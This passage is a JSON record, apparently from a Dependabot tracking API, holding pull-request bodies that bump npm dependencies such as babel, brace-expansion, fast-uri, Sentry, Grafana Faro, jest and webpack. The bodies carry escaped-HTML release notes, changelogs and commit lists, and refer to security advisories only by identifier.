href=\"https://github.com/babel/babel/commit/a458f66074b97d54773db8159af673d23b26079b\"\u003e\u003ccode\u003ea458f66\u003c/code\u003e\u003c/a\u003e v7.29.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/32ebd5aaf2526ddd176fd6a3d1e3dc594abdc8d9\"\u003e\u003ccode\u003e32ebd5a\u003c/code\u003e\u003c/a\u003e [7.x backport]fix(systemjs): improve module string name support (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-plugin-transform-modules-systemjs/issues/17974\"\u003e#17974\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/aa8394e454337d118ac3d40bfa3ee1a3cb3f3ed2\"\u003e\u003ccode\u003eaa8394e\u003c/code\u003e\u003c/a\u003e v7.29.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/0053db620c05acf0036f593b5aaf4e372daa79d0\"\u003e\u003ccode\u003e0053db6\u003c/code\u003e\u003c/a\u003e Update polyfill packages (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-plugin-transform-modules-systemjs/issues/17727\"\u003e#17727\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/61647ae2397c82c3c71f077b5ab109106a5cac0f\"\u003e\u003ccode\u003e61647ae\u003c/code\u003e\u003c/a\u003e v7.28.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/a177d551adba99773f4ff00ea9bf46550def6132\"\u003e\u003ccode\u003ea177d55\u003c/code\u003e\u003c/a\u003e [Babel 8] Use \u003ccode\u003et.traverseFast\u003c/code\u003e to replace some \u003ccode\u003epath.traverse\u003c/code\u003e (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-plugin-transform-modules-systemjs/issues/17518\"\u003e#17518\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/eebd3a06021c13d335b5b0bd79734df3abbea678\"\u003e\u003ccode\u003eeebd3a0\u003c/code\u003e\u003c/a\u003e v7.27.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/317e332e650bc04907bc787ab79f930288a3e71e\"\u003e\u003ccode\u003e317e332\u003c/code\u003e\u003c/a\u003e Enforce node protocol import (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-plugin-transform-modules-systemjs/issues/17207\"\u003e#17207\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/fdc0fb59e119ee0b38bced63867a344a5b4bc2f3\"\u003e\u003ccode\u003efdc0fb5\u003c/code\u003e\u003c/a\u003e [Babel 8] Bump nodejs requirements to \u003ccode\u003e^20.19.0 || \u0026gt;= 22.12.0\u003c/code\u003e (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-plugin-transform-modules-systemjs/issues/17204\"\u003e#17204\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/babel/babel/commits/v7.29.7/packages/babel-plugin-transform-modules-systemjs\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~GitHub%20Actions\"\u003eGitHub Actions\u003c/a\u003e, a new releaser for \u003ccode\u003e@​babel/plugin-transform-modules-systemjs\u003c/code\u003e since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `brace-expansion` from 1.1.12 to 1.1.15\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/juliangruber/brace-expansion/releases\"\u003ebrace-expansion's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.1.15\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eBackport v5.0.6 change to v1 (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/111\"\u003e#111\u003c/a\u003e)  0b09384\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr /\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/compare/v1.1.14...v1.1.15\"\u003ehttps://github.com/juliangruber/brace-expansion/compare/v1.1.14...v1.1.15\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/2203f4f4895eba16c4d408b4219ce1b8e5f6ff24\"\u003e\u003ccode\u003e2203f4f\u003c/code\u003e\u003c/a\u003e 1.1.15\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/0b0938410732370559704230724ca4a44d1b29fd\"\u003e\u003ccode\u003e0b09384\u003c/code\u003e\u003c/a\u003e Backport v5.0.6 change to v1 (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/111\"\u003e#111\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/10c05fcf3699b1a29ef5e611c011af3d3c97e6e3\"\u003e\u003ccode\u003e10c05fc\u003c/code\u003e\u003c/a\u003e 1.1.14\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/1afa1b22ead12f6a7a02f25bf0f7d64c2439b007\"\u003e\u003ccode\u003e1afa1b2\u003c/code\u003e\u003c/a\u003e Add opt-in { max } mitigation to v1 legacy line (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/103\"\u003e#103\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/2fbb6a2aa0f984bb2fb5f60252ca6cba3e1368ec\"\u003e\u003ccode\u003e2fbb6a2\u003c/code\u003e\u003c/a\u003e Revert \u0026quot;Backport fix for GHSA-7h2j-956f-4vf2 to v1 (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/101\"\u003e#101\u003c/a\u003e)\u0026quot; (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/102\"\u003e#102\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/0d7652e3093d3273151729812f9b0b79a17ecba6\"\u003e\u003ccode\u003e0d7652e\u003c/code\u003e\u003c/a\u003e Backport fix for GHSA-7h2j-956f-4vf2 to v1 (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/101\"\u003e#101\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/6c353caf23beb9644f858eb3fe38d43a68b82898\"\u003e\u003ccode\u003e6c353ca\u003c/code\u003e\u003c/a\u003e 1.1.13\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/7fd684f89fdde3549563d0a6522226a9189472a2\"\u003e\u003ccode\u003e7fd684f\u003c/code\u003e\u003c/a\u003e Backport fix for GHSA-f886-m6hf-6m8v (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/95\"\u003e#95\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/juliangruber/brace-expansion/compare/v1.1.12...v1.1.15\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `fast-uri` from 3.0.3 to 3.1.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/fastify/fast-uri/releases\"\u003efast-uri's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev3.1.2\u003c/h2\u003e\n\u003ch2\u003e⚠️ Security Release\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix for \u003ca href=\"https://github.com/fastify/fast-uri/security/advisories/GHSA-v39h-62p7-jpjc\"\u003ehttps://github.com/fastify/fast-uri/security/advisories/GHSA-v39h-62p7-jpjc\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eHandle malformed fragment decoding as a parse error by \u003ca href=\"https://github.com/mcollina\"\u003e\u003ccode\u003e@​mcollina\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/171\"\u003efastify/fast-uri#171\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/fastify/fast-uri/compare/v3.1.1...v3.1.2\"\u003ehttps://github.com/fastify/fast-uri/compare/v3.1.1...v3.1.2\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev3.1.1\u003c/h2\u003e\n\u003ch2\u003e⚠️ Security Release\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix for \u003ca href=\"https://github.com/fastify/fast-uri/security/advisories/GHSA-q3j6-qgpj-74h6\"\u003ehttps://github.com/fastify/fast-uri/security/advisories/GHSA-q3j6-qgpj-74h6\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003ebuild(deps-dev): bump tsd from 0.32.0 to 0.33.0 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/148\"\u003efastify/fast-uri#148\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump actions/checkout from 4 to 5 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/149\"\u003efastify/fast-uri#149\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(.npmrc): ignore sc...\n\n_Description has been truncated_","html_url":"https://github.com/Dct555/graphiql/pull/5","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/Dct555%2Fgraphiql/issues/5","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/5/packages"},{"uuid":"4551920197","node_id":"PR_kwDODjzvHs7g0j_u","number":4268,"state":"closed","title":"Bump the patch-and-minor group across 1 directory with 24 updates","user":"dependabot[bot]","labels":["dependencies","javascript"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":"2026-06-03T04:29:21.000Z","author_association":null,"state_reason":null,"created_at":"2026-05-29T22:05:53.000Z","updated_at":"2026-06-03T04:29:23.000Z","time_to_close":368608,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Bump","group_name":"patch-and-minor","update_count":24,"packages":[{"name":"@grafana/faro-web-sdk","old_version":"2.4.0","new_version":"2.7.0","repository_url":"https://github.com/grafana/faro-web-sdk"},{"name":"@grafana/faro-web-tracing","old_version":"2.4.0","new_version":"2.7.0","repository_url":"https://github.com/grafana/faro-web-sdk"},{"name":"@sentry/browser","old_version":"10.51.0","new_version":"10.53.1","repository_url":"https://github.com/getsentry/sentry-javascript"},{"name":"@sentry/cli","old_version":"3.4.1","new_version":"3.4.3","repository_url":"https://github.com/getsentry/sentry-cli"},{"name":"@sentry/react","old_version":"10.51.0","new_version":"10.53.1","repository_url":"https://github.com/getsentry/sentry-javascript"},{"name":"@tanstack/react-query","old_version":"5.100.9","new_version":"5.100.13","repository_url":"https://github.com/TanStack/query"},{"name":"axios","old_version":"1.15.2","new_version":"1.16.1","repository_url":"https://github.com/axios/axios"},{"name":"echarts","old_version":"6.0.0","new_version":"6.1.0","repository_url":"https://github.com/apache/echarts"},{"name":"postcss","old_version":"8.5.12","new_version":"8.5.15","repository_url":"https://github.com/postcss/postcss"},{"name":"@babel/preset-env","old_version":"7.29.2","new_version":"7.29.5","repository_url":"https://github.com/babel/babel"},{"name":"@babel/register","old_version":"7.28.6","new_version":"7.29.3","repository_url":"https://github.com/babel/babel"},{"name":"@tanstack/react-query-devtools","old_version":"5.100.9","new_version":"5.100.13","repository_url":"https://github.com/TanStack/query"},{"name":"babel-jest","old_version":"30.3.0","new_version":"30.4.1","repository_url":"https://github.com/jestjs/jest"},{"name":"eslint-plugin-storybook","old_version":"10.3.6","new_version":"10.4.1","repository_url":"https://github.com/storybookjs/storybook"},{"name":"jest","old_version":"30.3.0","new_version":"30.4.2","repository_url":"https://github.com/jestjs/jest"},{"name":"jest-environment-jsdom","old_version":"30.3.0","new_version":"30.4.1","repository_url":"https://github.com/jestjs/jest"},{"name":"msw","old_version":"2.13.6","new_version":"2.14.6","repository_url":"https://github.com/mswjs/msw"},{"name":"storybook","old_version":"10.3.6","new_version":"10.4.1","repository_url":"https://github.com/storybookjs/storybook"},{"name":"terser-webpack-plugin","old_version":"5.5.0","new_version":"5.6.0","repository_url":"https://github.com/webpack/minimizer-webpack-plugin"},{"name":"typescript-eslint","old_version":"8.59.1","new_version":"8.59.4","repository_url":"https://github.com/typescript-eslint/typescript-eslint"},{"name":"webpack","old_version":"5.106.2","new_version":"5.107.1","repository_url":"https://github.com/webpack/webpack"},{"name":"webpack-dev-server","old_version":"5.2.3","new_version":"5.2.4","repository_url":"https://github.com/webpack/webpack-dev-server"},{"name":"express-rate-limit","old_version":"8.5.0","new_version":"8.5.2","repository_url":"https://github.com/express-rate-limit/express-rate-limit"},{"name":"helmet","old_version":"8.1.0","new_version":"8.2.0","repository_url":"https://github.com/helmetjs/helmet"}],"path":null,"ecosystem":"npm"},"body":"Bumps the patch-and-minor group with 24 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [@grafana/faro-web-sdk](https://github.com/grafana/faro-web-sdk/tree/HEAD/packages/web-sdk) | `2.4.0` | `2.7.0` |\n| [@grafana/faro-web-tracing](https://github.com/grafana/faro-web-sdk/tree/HEAD/packages/web-tracing) | `2.4.0` | `2.7.0` |\n| [@sentry/browser](https://github.com/getsentry/sentry-javascript) | `10.51.0` | `10.53.1` |\n| [@sentry/cli](https://github.com/getsentry/sentry-cli) | `3.4.1` | `3.4.3` |\n| [@sentry/react](https://github.com/getsentry/sentry-javascript) | `10.51.0` | `10.53.1` |\n| [@tanstack/react-query](https://github.com/TanStack/query/tree/HEAD/packages/react-query) | `5.100.9` | `5.100.13` |\n| [axios](https://github.com/axios/axios) | `1.15.2` | `1.16.1` |\n| [echarts](https://github.com/apache/echarts) | `6.0.0` | `6.1.0` |\n| [postcss](https://github.com/postcss/postcss) | `8.5.12` | `8.5.15` |\n| [@babel/preset-env](https://github.com/babel/babel/tree/HEAD/packages/babel-preset-env) | `7.29.2` | `7.29.5` |\n| [@babel/register](https://github.com/babel/babel/tree/HEAD/packages/babel-register) | `7.28.6` | `7.29.3` |\n| [@tanstack/react-query-devtools](https://github.com/TanStack/query/tree/HEAD/packages/react-query-devtools) | `5.100.9` | `5.100.13` |\n| [babel-jest](https://github.com/jestjs/jest/tree/HEAD/packages/babel-jest) | `30.3.0` | `30.4.1` |\n| [eslint-plugin-storybook](https://github.com/storybookjs/storybook/tree/HEAD/code/lib/eslint-plugin) | `10.3.6` | `10.4.1` |\n| [jest](https://github.com/jestjs/jest/tree/HEAD/packages/jest) | `30.3.0` | `30.4.2` |\n| [jest-environment-jsdom](https://github.com/jestjs/jest/tree/HEAD/packages/jest-environment-jsdom) | `30.3.0` | `30.4.1` |\n| [msw](https://github.com/mswjs/msw) | `2.13.6` | `2.14.6` |\n| [storybook](https://github.com/storybookjs/storybook/tree/HEAD/code/core) | `10.3.6` | `10.4.1` |\n| [terser-webpack-plugin](https://github.com/webpack/minimizer-webpack-plugin) | `5.5.0` | `5.6.0` |\n| [typescript-eslint](https://github.com/typescript-eslint/typescript-eslint/tree/HEAD/packages/typescript-eslint) | `8.59.1` | `8.59.4` |\n| [webpack](https://github.com/webpack/webpack) | `5.106.2` | `5.107.1` |\n| [webpack-dev-server](https://github.com/webpack/webpack-dev-server) | `5.2.3` | `5.2.4` |\n| [express-rate-limit](https://github.com/express-rate-limit/express-rate-limit) | `8.5.0` | `8.5.2` |\n| [helmet](https://github.com/helmetjs/helmet) | `8.1.0` | `8.2.0` |\n\n\nUpdates `@grafana/faro-web-sdk` from 2.4.0 to 2.7.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/grafana/faro-web-sdk/releases\"\u003e@​grafana/faro-web-sdk's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.7.0\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/grafana/faro-web-sdk/compare/v2.6.3...v2.7.0\"\u003e2.7.0\u003c/a\u003e (2026-05-20)\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003ecore:\u003c/strong\u003e include git commit hash in app meta (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2039\"\u003e#2039\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/9c82ce49bc6d02c8a9b9a83227f101ce224a79b8\"\u003e9c82ce4\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003ecore:\u003c/strong\u003e fall back to window when resolving Metro bundle id (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2079\"\u003e#2079\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/3cfd6204b7bc83e5c440c523b6287993ccfbd728\"\u003e3cfd620\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003edemo:\u003c/strong\u003e bind Tempo OTLP receiver to 0.0.0.0 so Alloy can reach it (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2038\"\u003e#2038\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/7a0af536a4a7254bf62473b20d04cf937ecd246a\"\u003e7a0af53\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003edemo:\u003c/strong\u003e use \u003ccode\u003egrafana server\u003c/code\u003e subcommand for Grafana 13 image (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2035\"\u003e#2035\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/5d9210769e5e0752f41a3f543089397d9fe8149a\"\u003e5d92107\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update npm-dependencies (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2077\"\u003e#2077\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/8574f5579b8c84a829269aa7e19e76238daa6b6e\"\u003e8574f55\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003epin package manager and disable yarn/npm scripts (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2075\"\u003e#2075\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/ef2d248259f99e3e712bceff0f6fc99f6b0d81e1\"\u003eef2d248\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.6.3\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/grafana/faro-web-sdk/compare/v2.6.2...v2.6.3\"\u003e2.6.3\u003c/a\u003e (2026-05-11)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eci:\u003c/strong\u003e make release-please auto-tag on merge (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2069\"\u003e#2069\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/de9e2f05c28ea5644a8f8647c41f8eb686e2736c\"\u003ede9e2f0\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.6.2\u003c/h2\u003e\n\u003cp\u003eSee \u003ca href=\"https://github.com/grafana/faro-web-sdk/blob/v2.6.2/CHANGELOG.md\"\u003eCHANGELOG.md\u003c/a\u003e for the full list of changes.\u003c/p\u003e\n\u003cp\u003eThis release was tagged manually as a one-off recovery. Release-please's title parser still doesn't match merged release PRs back to their config because of how it handles \u003ccode\u003ecomponent\u003c/code\u003e together with \u003ccode\u003einclude-component-in-tag: false\u003c/code\u003e. A follow-up will redesign the release-please configuration.\u003c/p\u003e\n\u003ch2\u003ev2.6.1\u003c/h2\u003e\n\u003cp\u003eSee \u003ca href=\"https://github.com/grafana/faro-web-sdk/blob/v2.6.1/CHANGELOG.md\"\u003eCHANGELOG.md\u003c/a\u003e for the full list of changes.\u003c/p\u003e\n\u003cp\u003eThis release was tagged manually as a one-off recovery; release-please could not auto-tag PR \u003ca href=\"https://github.com/grafana/faro-web-sdk/tree/HEAD/packages/web-sdk/issues/2064\"\u003e#2064\u003c/a\u003e because the title pattern was missing \u003ccode\u003e${component}\u003c/code\u003e. Fixed in \u003ca href=\"https://github.com/grafana/faro-web-sdk/tree/HEAD/packages/web-sdk/issues/2066\"\u003e#2066\u003c/a\u003e \\u2014 the next release will tag automatically.\u003c/p\u003e\n\u003ch2\u003ev2.6.0\u003c/h2\u003e\n\u003cp\u003eSee \u003ca href=\"https://github.com/grafana/faro-web-sdk/blob/v2.6.0/CHANGELOG.md\"\u003eCHANGELOG.md\u003c/a\u003e for the full list of changes.\u003c/p\u003e\n\u003cp\u003eThis release was tagged manually as a one-off recovery; release-please could not auto-tag PR \u003ca href=\"https://github.com/grafana/faro-web-sdk/tree/HEAD/packages/web-sdk/issues/2052\"\u003e#2052\u003c/a\u003e because its title (\u003ccode\u003echore: release main\u003c/code\u003e) lacked \u003ccode\u003e${version}\u003c/code\u003e. The PR title pattern was fixed in \u003ca href=\"https://github.com/grafana/faro-web-sdk/tree/HEAD/packages/web-sdk/issues/2063\"\u003e#2063\u003c/a\u003e — future releases will tag automatically.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/grafana/faro-web-sdk/blob/main/CHANGELOG.md\"\u003e@​grafana/faro-web-sdk's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/grafana/faro-web-sdk/compare/v2.6.3...v2.7.0\"\u003e2.7.0\u003c/a\u003e (2026-05-20)\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003ecore:\u003c/strong\u003e include git commit hash in app meta (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2039\"\u003e#2039\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/9c82ce49bc6d02c8a9b9a83227f101ce224a79b8\"\u003e9c82ce4\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003ecore:\u003c/strong\u003e fall back to window when resolving Metro bundle id (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2079\"\u003e#2079\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/3cfd6204b7bc83e5c440c523b6287993ccfbd728\"\u003e3cfd620\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003edemo:\u003c/strong\u003e bind Tempo OTLP receiver to 0.0.0.0 so Alloy can reach it (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2038\"\u003e#2038\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/7a0af536a4a7254bf62473b20d04cf937ecd246a\"\u003e7a0af53\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003edemo:\u003c/strong\u003e use \u003ccode\u003egrafana server\u003c/code\u003e subcommand for Grafana 13 image (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2035\"\u003e#2035\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/5d9210769e5e0752f41a3f543089397d9fe8149a\"\u003e5d92107\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update npm-dependencies (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2077\"\u003e#2077\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/8574f5579b8c84a829269aa7e19e76238daa6b6e\"\u003e8574f55\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003epin package manager and disable yarn/npm scripts (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2075\"\u003e#2075\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/ef2d248259f99e3e712bceff0f6fc99f6b0d81e1\"\u003eef2d248\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/grafana/faro-web-sdk/compare/v2.6.2...v2.6.3\"\u003e2.6.3\u003c/a\u003e (2026-05-11)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eci:\u003c/strong\u003e make release-please auto-tag on merge (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2069\"\u003e#2069\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/de9e2f05c28ea5644a8f8647c41f8eb686e2736c\"\u003ede9e2f0\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/grafana/faro-web-sdk/compare/v2.6.1...v2.6.2\"\u003e2.6.2\u003c/a\u003e (2026-05-11)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eci:\u003c/strong\u003e include ${component} in release-please PR title (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2066\"\u003e#2066\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/367aacc76fbb4777a61da40652bbe891826e0039\"\u003e367aacc\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/grafana/faro-web-sdk/compare/v2.6.0...v2.6.1\"\u003e2.6.1\u003c/a\u003e (2026-05-11)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eci:\u003c/strong\u003e set release-please PR title pattern with version (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2063\"\u003e#2063\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/4310b1685b4963de539919a15edd797aa21d032b\"\u003e4310b16\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/grafana/faro-web-sdk/compare/v2.5.0...v2.6.0\"\u003e2.6.0\u003c/a\u003e (2026-05-11)\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003ereplay:\u003c/strong\u003e pause recording after user inactivity (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2015\"\u003e#2015\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/fedbe7ff41c592a7782737ea2200680cf8796800\"\u003efedbe7f\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eweb-sdk:\u003c/strong\u003e add \u003ccode\u003ehttpHost\u003c/code\u003e to \u003ccode\u003efaro.performance.resource\u003c/code\u003e events (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2014\"\u003e#2014\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/517d26f17f96d21990e52c5804a0b77676f685df\"\u003e517d26f\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eci:\u003c/strong\u003e anchor release-please at v2.5.0 commit on main (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2061\"\u003e#2061\u003c/a\u003e) (\u003ca 